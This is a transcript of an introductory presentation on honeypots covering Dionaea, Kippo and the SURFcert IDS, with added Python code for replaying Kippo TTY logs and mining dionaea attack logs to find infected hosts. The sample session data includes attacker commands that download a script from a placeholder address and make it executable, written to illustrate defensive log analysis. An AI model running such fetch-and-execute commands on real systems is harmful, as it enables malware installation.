
A short introduction to honeypots


Presentation Transcript


  1. A short introduction to honeypots
Emmanouil Vasilomanolakis, PhD candidate, Telecooperation Group, Technische Universität Darmstadt, Center for Advanced Security Research Darmstadt (CASED); associate of the Networks Laboratory ISLAB, Institute of Informatics and Telecommunications (IIT), NCSR Demokritos. manolis@cased.de

  2. Outline
• Introduction
• Classifications
• Deployment architectures
• Open source vs. nothing
• Two honeypots: Dionaea and Kippo
• SURFcert IDS and experiences from Demokritos
• Future work and ideas
Telecooperation Group | CASED

  3. Introduction
• Definition: "A security resource whose value lies in being probed, attacked or compromised"
• It doesn't have to be a system: honeytokens (a planted credential, record or document that has no legitimate use, so any use of it is an alert)
• We want to get compromised!
• Certainly not a standalone security mechanism.
• Why?
• Fun!
• No false positives: the honeypot offers no legitimate service, so every interaction with it is suspicious by definition (the caveat is your own scanners and misconfigured clients, which must be excluded from alerting)
• Research: malware analysis and reverse engineering
• Reducing the available attack surface / early-warning system

  4. Honeypot classifications
• Low interaction: emulate network services (usually at the TCP/IP stack level)
• [Medium interaction: emulate network services in more "sophisticated" ways]
• High interaction: real systems (e.g., VMs)
• Other classifications:
• Purpose: generic, malware collectors, SSH, etc.
• Production vs. research (not really useful)

  5. Honeypot deployment architectures

  6. Open source vs. nothing (really!)

  7. Dionaea
• Low-interaction honeypot for collecting malware
• Successor of Nepenthes
• Main protocol emulated: SMB (port 445)
• Others: HTTP, HTTPS, FTP, TFTP, MSSQL and SIP (VoIP)
• Also supports IPv6 and TLS
• Malware files: stored locally and/or sent to third-party sandboxes (CWSandbox, Norman Sandbox, Anubis, VirusTotal)

  8. Kippo (1/2)
• Low-interaction SSH honeypot
• Features:
• Presents a fake (but "functional") system to the attacker, resembling a Debian 5.0 installation
• The attacker can download his tools through wget, and we save them for later inspection (cool!)
• Session logs are stored in a UML (User Mode Linux) compatible TTY log format, so a session can be replayed with its original timings (even cooler!)
• Easy to install, but hard to get hackers!
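The TTY log replay mentioned above, as an added example that is not Kippo's own code. The record layout is an assumption modelled on Kippo's ttylog module (a 24-byte little-endian header packed as `<iLiiLL`: op, tty, length, direction, seconds, microseconds, followed by the payload; op 3 is a write, direction 1 is attacker input, 2 is honeypot output); check it against the ttylog.py in your Kippo checkout before pointing this at real logs. The session bytes, the `svr03` prompt and the 192.0.2.10 address are constructed sample data.

```python
"""Write, parse and replay a Kippo-style TTY session log (added example).

Layout assumed here, modelled on Kippo's ttylog module: a 24-byte
little-endian header '<iLiiLL' = (op, tty, length, direction, seconds,
microseconds) followed by `length` payload bytes. op 3 = write,
direction 1 = attacker input, direction 2 = honeypot output.
"""
import struct
import time
from typing import Callable, Iterator, List, Tuple

HEADER = "<iLiiLL"
HEADER_SIZE = struct.calcsize(HEADER)  # 24 bytes
OP_WRITE = 3
TYPE_INPUT, TYPE_OUTPUT = 1, 2


def ttylog_write(buf: bytearray, direction: int, stamp: float, data: bytes) -> None:
    """Append one write record to an in-memory log (Kippo appends to a file)."""
    sec = int(stamp)
    usec = int(round((stamp - sec) * 1_000_000))
    buf += struct.pack(HEADER, OP_WRITE, 0, len(data), direction, sec, usec)
    buf += data


def ttylog_read(blob: bytes) -> Iterator[Tuple[int, float, bytes]]:
    """Yield (direction, timestamp, payload) per write record; reject truncated logs."""
    off = 0
    while off + HEADER_SIZE <= len(blob):
        op, _tty, length, direction, sec, usec = struct.unpack_from(HEADER, blob, off)
        off += HEADER_SIZE
        data = blob[off:off + length]
        if len(data) != length:
            raise ValueError(f"truncated record at offset {off}")
        off += length
        if op == OP_WRITE:
            yield direction, sec + usec / 1_000_000, data
    if off != len(blob):
        raise ValueError("trailing bytes after the last record")


def replay_schedule(blob: bytes, speed: float = 1.0,
                    max_delay: float = 3.0) -> List[Tuple[float, int, bytes]]:
    """Convert absolute timestamps into (delay_before, direction, payload).

    Delays keep the attacker's original pacing (optionally sped up) and are
    capped so a session with long idle gaps still replays in reasonable time.
    """
    schedule, prev = [], None
    for direction, ts, data in ttylog_read(blob):
        delay = 0.0 if prev is None else min(max(ts - prev, 0.0) / speed, max_delay)
        schedule.append((delay, direction, data))
        prev = ts
    return schedule


def attacker_commands(blob: bytes) -> List[str]:
    """Reassemble what the attacker typed (input often arrives one keystroke per record)."""
    typed = b"".join(d for direction, _ts, d in ttylog_read(blob) if direction == TYPE_INPUT)
    return [line.decode("utf-8", "replace") for line in typed.split(b"\n") if line.strip()]


def replay(blob: bytes, speed: float = 1.0,
           sleep: Callable[[float], None] = time.sleep) -> None:
    """Print the output stream with original timing (the shell echoes keystrokes, so output alone is what the attacker saw)."""
    for delay, direction, data in replay_schedule(blob, speed):
        sleep(delay)
        if direction == TYPE_OUTPUT:
            print(data.decode("utf-8", "replace"), end="", flush=True)


def build_sample_session() -> bytes:
    """Constructed four-record session; 192.0.2.10 is a documentation address, not a real host."""
    buf = bytearray()
    t0 = 1_700_000_000.0
    ttylog_write(buf, TYPE_OUTPUT, t0, b"root@svr03:~# ")
    ttylog_write(buf, TYPE_INPUT, t0 + 2.5, b"wget http://192.0.2.10/x.sh\n")
    ttylog_write(buf, TYPE_OUTPUT, t0 + 2.75, b"wget http://192.0.2.10/x.sh\nSaving to: 'x.sh'\nroot@svr03:~# ")
    ttylog_write(buf, TYPE_INPUT, t0 + 9.0, b"chmod +x x.sh\n")
    return bytes(buf)


if __name__ == "__main__":
    session = build_sample_session()
    print("attacker typed:", attacker_commands(session))
    replay(session, speed=10.0)
```

The parser refuses a log whose last record is cut short instead of silently dropping it; a half-written record usually means the honeypot was killed mid-session, which is itself worth noticing.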

  9. SURFcert IDS
• An open-source (GPLv2) distributed intrusion detection system based on honeypots
• Sensors act as proxies, forwarding network traffic from the monitored network to the system's centre over OpenVPN
• Supported honeypots: Nepenthes, Dionaea, Argos, Kippo
• Three parts:
• Tunnel / honeypot server
• Web / logging server
• Sensors

  10. SURFcert IDS
• Also:
• Supports p0f for passive OS fingerprinting of attackers
• Statistics, a nice web GUI, sensor status, geographical visualisations, and more

  11. SURFcert IDS @ Demokritos
• Some stats:
• 21,000 attacks on 3 different sensors (1 month)
• 1,500 malware files downloaded
• Main target: port 445
• Successfully detected infected systems inside our network (mostly with a Conficker worm variant)
• Automatic malware analysis can give us valuable information on botnets (and their C&C IRC servers)
• Possible to find zero-day exploits / new malware (or different variants)
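How the "no false positives" property of slide 3 turns into the infected-host detection and the per-port statistics of this slide, as an added example that is not SURFcert IDS's or dionaea's own code. The two-table schema is an assumption modelled on dionaea's logsql database (`connections` and `downloads`); verify the column names against your own instance before reusing the queries. The monitored range 10.0.0.0/8, the honeypot address 203.0.113.5 and every row and hash below are constructed sample data.

```python
"""Mine a dionaea-style connection log for attack statistics and infected
internal hosts (added example; schema and rows are constructed).

Assumed schema, modelled on dionaea's logsql.sqlite: `connections` holds one
row per socket event (connection_type 'accept' for inbound attacks, 'listen'
for our listeners, 'connect' for the honeypot's own outbound fetches) and
`downloads` one row per captured file, keyed to the connection it came from.
"""
import ipaddress
import sqlite3
from typing import List, Tuple

# Assumed range of the network the sensors watch: nothing inside it has any
# business talking to a honeypot, so an internal source is an infected host.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

SCHEMA = """
CREATE TABLE connections (
    connection INTEGER PRIMARY KEY,
    connection_type TEXT, connection_transport TEXT, connection_protocol TEXT,
    connection_timestamp INTEGER,
    local_host TEXT, local_port INTEGER, remote_host TEXT, remote_port INTEGER
);
CREATE TABLE downloads (
    download INTEGER PRIMARY KEY, connection INTEGER,
    download_url TEXT, download_md5_hash TEXT
);
"""

# Constructed rows: (type, transport, protocol, ts, local_host, local_port, remote_host, remote_port)
SAMPLE_CONNECTIONS = [
    ("accept", "tcp", "smbd", 1700000000, "203.0.113.5", 445, "192.0.2.10", 50123),
    ("accept", "tcp", "smbd", 1700000060, "203.0.113.5", 445, "192.0.2.10", 50124),
    ("accept", "tcp", "smbd", 1700000120, "203.0.113.5", 445, "198.51.100.7", 40001),
    ("accept", "tcp", "httpd", 1700000180, "203.0.113.5", 80, "198.51.100.7", 40002),
    ("accept", "tcp", "smbd", 1700000240, "203.0.113.5", 445, "10.1.2.3", 1034),
    ("accept", "tcp", "smbd", 1700000300, "203.0.113.5", 445, "10.1.2.3", 1035),
    ("accept", "tcp", "mssqld", 1700000360, "203.0.113.5", 1433, "10.1.2.3", 1036),
    ("accept", "tcp", "smbd", 1700000420, "203.0.113.5", 445, "10.1.5.9", 2201),
    ("listen", "tcp", "smbd", 1699999000, "203.0.113.5", 445, "", 0),
    ("connect", "tcp", "ftpctrl", 1700000001, "203.0.113.5", 51000, "192.0.2.10", 21),
]
# Constructed rows: (connection id, url, md5); two captures of the same sample share a hash
SAMPLE_DOWNLOADS = [
    (1, "ftp://192.0.2.10/x.exe", "9e107d9d372bb6826bd81d3542a419d6"),
    (5, "smb://10.1.2.3/y.exe", "e4d909c290d0fb1ca068ffaddf22cbd0"),
    (6, "smb://10.1.2.3/y.exe", "e4d909c290d0fb1ca068ffaddf22cbd0"),
]


def open_sample_db() -> sqlite3.Connection:
    """Build the in-memory database from the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany(
        "INSERT INTO connections (connection_type, connection_transport, connection_protocol,"
        " connection_timestamp, local_host, local_port, remote_host, remote_port)"
        " VALUES (?,?,?,?,?,?,?,?)", SAMPLE_CONNECTIONS)
    conn.executemany(
        "INSERT INTO downloads (connection, download_url, download_md5_hash) VALUES (?,?,?)",
        SAMPLE_DOWNLOADS)
    return conn


def total_attacks(conn: sqlite3.Connection) -> int:
    """Inbound connections only; listeners and our own outbound fetches are not attacks."""
    return conn.execute("SELECT COUNT(*) FROM connections WHERE connection_type='accept'").fetchone()[0]


def top_target_ports(conn: sqlite3.Connection, n: int = 3) -> List[Tuple[int, int]]:
    """Most attacked local ports, ties broken by port number."""
    rows = conn.execute(
        "SELECT local_port, COUNT(*) FROM connections WHERE connection_type='accept'"
        " GROUP BY local_port ORDER BY 2 DESC, 1").fetchall()
    return [(int(p), int(c)) for p, c in rows[:n]]


def unique_samples(conn: sqlite3.Connection) -> int:
    """Distinct binaries, so re-downloads of the same worm are not counted twice."""
    return conn.execute("SELECT COUNT(DISTINCT download_md5_hash) FROM downloads").fetchone()[0]


def is_internal(host: str) -> bool:
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:  # empty remote_host on listen rows, hostnames, garbage
        return False
    return any(addr in net for net in INTERNAL_NETS)


def internal_attackers(conn: sqlite3.Connection) -> List[Tuple[str, int, List[str]]]:
    """Internal sources that touched the honeypot: (host, hits, protocols), busiest first."""
    rows = conn.execute(
        "SELECT remote_host, COUNT(*), GROUP_CONCAT(DISTINCT connection_protocol)"
        " FROM connections WHERE connection_type='accept' GROUP BY remote_host").fetchall()
    found = [(h, c, sorted(p.split(","))) for h, c, p in rows if is_internal(h)]
    return sorted(found, key=lambda r: (-r[1], r[0]))


if __name__ == "__main__":
    db = open_sample_db()
    print("attacks:", total_attacks(db), "top ports:", top_target_ports(db))
    print("unique samples:", unique_samples(db))
    for host, hits, protos in internal_attackers(db):
        print(f"INFECTED? {host} hit the honeypot {hits}x via {','.join(protos)}")
```

An internal host appearing even once is worth a ticket; the ranking only decides which machine to pull off the network first. A host that talks SMB to the honeypot and nothing else matches the Conficker behaviour the slide describes.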

  12. Future work - ideas
• Features:
• Better visualization
• Anti-evasion techniques
• Cheap and easy mobile sensors: Raspberry Pi
• Advertising honeypots
• Honeypots:
• Mobile honeypots (e.g., Android)
• SCADA / Industrial Control Systems (ICS)
[Screenshot captions: "Attacker scans our system"; "Attacker trying to connect to our 'ftp' server"]

  13. Thank you! Questions?

  14. Backup slides

  15. Useful links
• Interesting stuff:
• http://www.islab.demokritos.gr - many honeypot-related theses available
• https://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots - ENISA report on honeypots
• http://publicids.surfnet.nl:8080/surfnetids/login.php - demo version of SURFcert IDS
• Honeypots:
• http://www.honeynet.org - general information on honeypots
• http://dionaea.carnivore.it - Dionaea honeypot
• http://amunhoney.sourceforge.net - Amun honeypot
• http://map.honeynet.org - honeypot visualization

  16. SURFcert IDS @ Demokritos
[Diagram labels: outside main firewall | inside main firewall]
